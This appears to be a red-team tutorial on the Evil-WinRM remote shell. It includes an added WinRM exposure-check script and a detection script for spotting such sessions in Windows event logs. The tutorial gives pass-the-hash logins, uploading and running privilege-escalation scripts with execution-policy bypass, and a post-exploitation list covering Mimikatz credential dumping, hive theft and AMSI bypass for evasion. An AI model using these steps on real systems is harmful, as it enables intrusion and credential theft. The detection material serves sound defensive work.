Evil-WinRM (Evil Windows Remote Management) is a PowerShell Remoting shell that allows authenticated users to interact with a remote Windows machine over the WinRM protocol.

Think of it like a remote PowerShell shell on steroids — fast, reliable, and custom-built for red team operations.

Use Evil-WinRM when:

  • You have valid credentials (username + password or NTLM hash) on a Windows machine
  • The target has WinRM enabled (usually port 5985 HTTP or 5986 HTTPS)
  • You want a stable shell for:
    • Uploading and executing payloads/scripts
    • Running PowerShell commands
    • Doing post-exploitation like privilege escalation, dumping hashes, etc.
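Before you reach for the tool, it helps to know what the listener on 5985/5986 actually offers, since that decides whether the password and hash logins above will work and what a defender should tighten. The following is an added example of mine, not Evil-WinRM code and not from the original post: it sends one unauthenticated POST to /wsman and reads the WWW-Authenticate header of the 401 reply (which is how a WinRM listener normally responds), then turns the port and offered schemes into findings. The assessment function is pure and runs offline; the probe needs a reachable host. Function names, the risk scale and the header shapes are my assumptions.

```python
"""WinRM listener exposure check (added example, not from the original post)."""
import http.client
import ssl
import sys
from typing import Dict, Iterable, List, Tuple

WINRM_HTTP_PORT = 5985   # plaintext listener
WINRM_HTTPS_PORT = 5986  # TLS listener


def parse_auth_schemes(headers: Iterable[Tuple[str, str]]) -> List[str]:
    """Collect scheme names from every WWW-Authenticate header value.

    A listener may send separate headers ('Negotiate', 'Basic realm="WSMan"')
    or one comma-separated value; both shapes are handled, order preserved.
    """
    schemes: List[str] = []
    for name, value in headers:
        if name.lower() != "www-authenticate":
            continue
        for part in value.split(","):
            scheme = part.strip().split(" ", 1)[0]
            if scheme and scheme not in schemes:
                schemes.append(scheme)
    return schemes


def assess_listener(port: int, schemes: List[str]) -> Dict[str, object]:
    """Map (port, offered schemes) to findings and a coarse risk level.

    Risk scale is my own: 'high' = Basic over plaintext HTTP, 'medium' = a
    plaintext listener or Basic over TLS, 'low' = Negotiate/Kerberos on TLS.
    """
    findings: List[str] = []
    plaintext = port == WINRM_HTTP_PORT
    risk = "low"
    if not schemes:
        findings.append("no WWW-Authenticate header: not a WinRM listener, or it did not answer with 401")
        return {"port": port, "encrypted": not plaintext, "schemes": schemes, "risk": "unknown", "findings": findings}
    if plaintext:
        risk = "medium"
        findings.append("HTTP listener on 5985: move to 5986 with a certificate, or firewall it to management hosts")
    if "Basic" in schemes:
        risk = "high" if plaintext else "medium"
        findings.append("Basic auth offered: credentials cross the wire only base64-encoded; disable Basic on the service")
    if "Negotiate" in schemes:
        # Negotiate falls back to NTLM, which is why a stolen NT hash (-H) logs in.
        findings.append("Negotiate offered: NTLM accepted, so a stolen NT hash works; restrict Remote Management Users and the WinRM firewall rule")
    return {"port": port, "encrypted": not plaintext, "schemes": schemes, "risk": risk, "findings": findings}


def probe_winrm(host: str, port: int = WINRM_HTTP_PORT, timeout: float = 5.0) -> Dict[str, object]:
    """Unauthenticated POST to /wsman; the reply's auth header is all we read."""
    if port == WINRM_HTTPS_PORT:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False      # listener certs are often self-signed; we only inspect headers
        ctx.verify_mode = ssl.CERT_NONE
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", "/wsman", body="",
                     headers={"Content-Type": "application/soap+xml;charset=UTF-8"})
        resp = conn.getresponse()
        result = assess_listener(port, parse_auth_schemes(resp.getheaders()))
        result["status"] = resp.status
        return result
    finally:
        conn.close()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for p in (WINRM_HTTP_PORT, WINRM_HTTPS_PORT):
        try:
            r = probe_winrm(target, p)
        except OSError as exc:
            print(f"{target}:{p} closed or unreachable ({exc})")
            continue
        print(f"{target}:{p} status={r['status']} schemes={r['schemes']} risk={r['risk']}")
        for f in r["findings"]:
            print("  -", f)
```

Run it as `python3 winrm_check.py 10.10.10.100` from the same network position you would use Evil-WinRM from; a closed 5986 next to an open 5985 offering Basic is the combination worth reporting first.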

Kali should already have it, but to install manually:

sudo gem install evil-winrm

Check it:

evil-winrm -h

Password login:

evil-winrm -i <IP> -u <user> -p <password>

Example:

evil-winrm -i 10.10.10.100 -u administrator -p 'Winter2024!'

You now have an interactive remote PowerShell shell.

Pass-the-hash login (the -H option takes the NT hash, i.e. the second half of an LM:NT pair):

evil-winrm -i 10.10.10.100 -u administrator -H <NTLM_HASH>

Example:

evil-winrm -i 10.10.10.100 -u administrator -H cc36cf7a8514893efccd332446158b1a

In an Evil-WinRM session, upload your favorite scripts:

upload /path/to/LinPE.ps1

Then run it:

powershell -ep bypass
. .\LinPE.ps1
Invoke-LinPE

upload is one of Evil-WinRM's built-in commands (type menu in the session to list them), so binaries go up the same way:

upload winPEASx64.exe

You can run classic recon commands right away:

whoami
hostname
ipconfig /all
systeminfo

Or load enumeration scripts:

upload PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

Once you’ve got Evil-WinRM access, here’s what you can do:

  • Run Mimikatz to dump credentials (if AV doesn’t block)
  • Grab SAM/SECURITY/SYSTEM hives if SYSTEM
  • Enumerate tokens and privileges
  • Check for AlwaysInstallElevated, unquoted paths, or registry misconfigs
  • Dump LSA secrets, look for hardcoded creds
  • Use Sharp tools (upload .exe or .dll)

You can load modules dynamically:

upload PrivescCheck.ps1
powershell -ep bypass
. .\PrivescCheck.ps1
Invoke-PrivescAudit

You can also invoke PowerView or BloodHound collectors for AD enumeration.

If your scripts are getting blocked:

  • Use base64 encoding
  • Try DLL sideloading
  • Use AMSIBYPASS before invoking payloads
  • Or just upload evasion-modified versions of your scripts (like Invoke-Mimikatz with obfuscation)

Option   Description
-i       Target IP address
-u       Username
-p       Password
-H       NTLM hash
-s       Script to execute
-c       Command to run
-e       Load external modules

Typical workflow:

  1. Compromise creds (e.g. from SMB, SQL, Kerberoasting)
  2. Confirm WinRM is open: nc -nv 10.10.10.100 5985
  3. Use Evil-WinRM to log in: evil-winrm -i 10.10.10.100 -u user -p pass
  4. Enumerate, upload tools, escalate
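Every step of that workflow leaves telemetry on the target, and the recon commands and uploads shown earlier are the loudest part: PowerShell Remoting runs inside wsmprovhost.exe, so whoami, ipconfig or systeminfo appear as 4688 process creations whose parent is wsmprovhost.exe, and anything written through the session's upload lands on disk as a file created by that same process (Sysmon event 11). The script below is an added example of mine, not from the original post and not Evil-WinRM code; it assumes the events have already been exported as JSON lines with the field names shown, and the sample records are constructed. Alert logic, field names and the risk labels are my assumptions.

```python
"""Spotting Evil-WinRM style sessions in exported Windows events (added example)."""
import json
import ntpath
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed sample telemetry: one noisy WinRM session on DC01 (NTLM logon,
# WinRM shell, two spawned recon binaries, one dropped tool) and one quiet
# admin session on FS01 that must not alert.
SAMPLE_LOG = r"""
{"time":"2024-03-01T10:00:00Z","host":"DC01","channel":"Security","EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","TargetUserName":"administrator","IpAddress":"10.10.14.5"}
{"time":"2024-03-01T10:00:01Z","host":"DC01","channel":"Microsoft-Windows-WinRM/Operational","EventID":91,"user":"administrator"}
{"time":"2024-03-01T10:00:05Z","host":"DC01","channel":"Security","EventID":4688,"SubjectUserName":"administrator","NewProcessName":"C:\\Windows\\System32\\whoami.exe","ParentProcessName":"C:\\Windows\\System32\\wsmprovhost.exe"}
{"time":"2024-03-01T10:00:07Z","host":"DC01","channel":"Security","EventID":4688,"SubjectUserName":"administrator","NewProcessName":"C:\\Windows\\System32\\ipconfig.exe","ParentProcessName":"C:\\Windows\\System32\\wsmprovhost.exe"}
{"time":"2024-03-01T10:01:30Z","host":"DC01","channel":"Microsoft-Windows-Sysmon/Operational","EventID":11,"User":"DC01\\administrator","Image":"C:\\Windows\\System32\\wsmprovhost.exe","TargetFilename":"C:\\Users\\administrator\\Documents\\winPEASx64.exe"}
{"time":"2024-03-01T11:00:00Z","host":"FS01","channel":"Microsoft-Windows-WinRM/Operational","EventID":91,"user":"svc_backup"}
{"time":"2024-03-01T11:00:02Z","host":"FS01","channel":"Security","EventID":4688,"SubjectUserName":"svc_backup","NewProcessName":"C:\\Windows\\System32\\conhost.exe","ParentProcessName":"C:\\Windows\\System32\\svchost.exe"}
"""

WSMAN_HOST = "wsmprovhost.exe"          # host process of a PowerShell Remoting session
DROP_EXTENSIONS = (".ps1", ".exe", ".dll")


def parse_events(text: str) -> List[Dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def _user(ev: Dict) -> Optional[str]:
    """Normalise the user field across Security, WinRM and Sysmon records."""
    for key in ("TargetUserName", "SubjectUserName", "user", "User"):
        if key in ev:
            return ev[key].split("\\")[-1].lower()   # strip DOMAIN\ prefix
    return None


def _image(path: str) -> str:
    return ntpath.basename(path).lower()


def detect_winrm_abuse(events: List[Dict]) -> List[Dict]:
    """Group events per (host, user) and alert when a WinRM session either
    spawns external binaries under wsmprovhost.exe or writes tooling to disk.
    A remoting session that only runs cmdlets spawns nothing and stays quiet."""
    sessions = defaultdict(lambda: {"logon": None, "shell": False, "spawned": [], "dropped": []})
    for ev in sorted(events, key=lambda e: e["time"]):
        s = sessions[(ev["host"], _user(ev))]
        eid = ev["EventID"]
        if eid == 4624 and ev.get("LogonType") == 3:
            s["logon"] = {"from": ev.get("IpAddress"), "package": ev.get("AuthenticationPackageName")}
        elif eid == 91 and ev.get("channel", "").endswith("WinRM/Operational"):
            s["shell"] = True                      # "Creating WSMan shell" on the server
        elif eid == 4688 and _image(ev.get("ParentProcessName", "")) == WSMAN_HOST:
            s["spawned"].append(_image(ev["NewProcessName"]))
        elif eid == 11 and _image(ev.get("Image", "")) == WSMAN_HOST:
            target = ev.get("TargetFilename", "")
            if target.lower().endswith(DROP_EXTENSIONS):
                s["dropped"].append(ntpath.basename(target))

    alerts = []
    for (host, user), s in sessions.items():
        if not (s["spawned"] or s["dropped"]):
            continue
        alerts.append({
            "host": host,
            "user": user,
            "logon": s["logon"],
            "shell_created": s["shell"],
            "spawned": s["spawned"],
            "dropped": s["dropped"],
            # a dropped binary/script is a stronger signal than spawned recon alone
            "risk": "high" if s["dropped"] else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_winrm_abuse(parse_events(SAMPLE_LOG)):
        print(json.dumps(alert, indent=2))
```

The grouping key is deliberately coarse (host and user, no time window) so the example stays short; in production you would bound each session by the 4624 LogonId and close it on the matching 4634, and feed the "from" address into the same allow-list you use for your management hosts.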
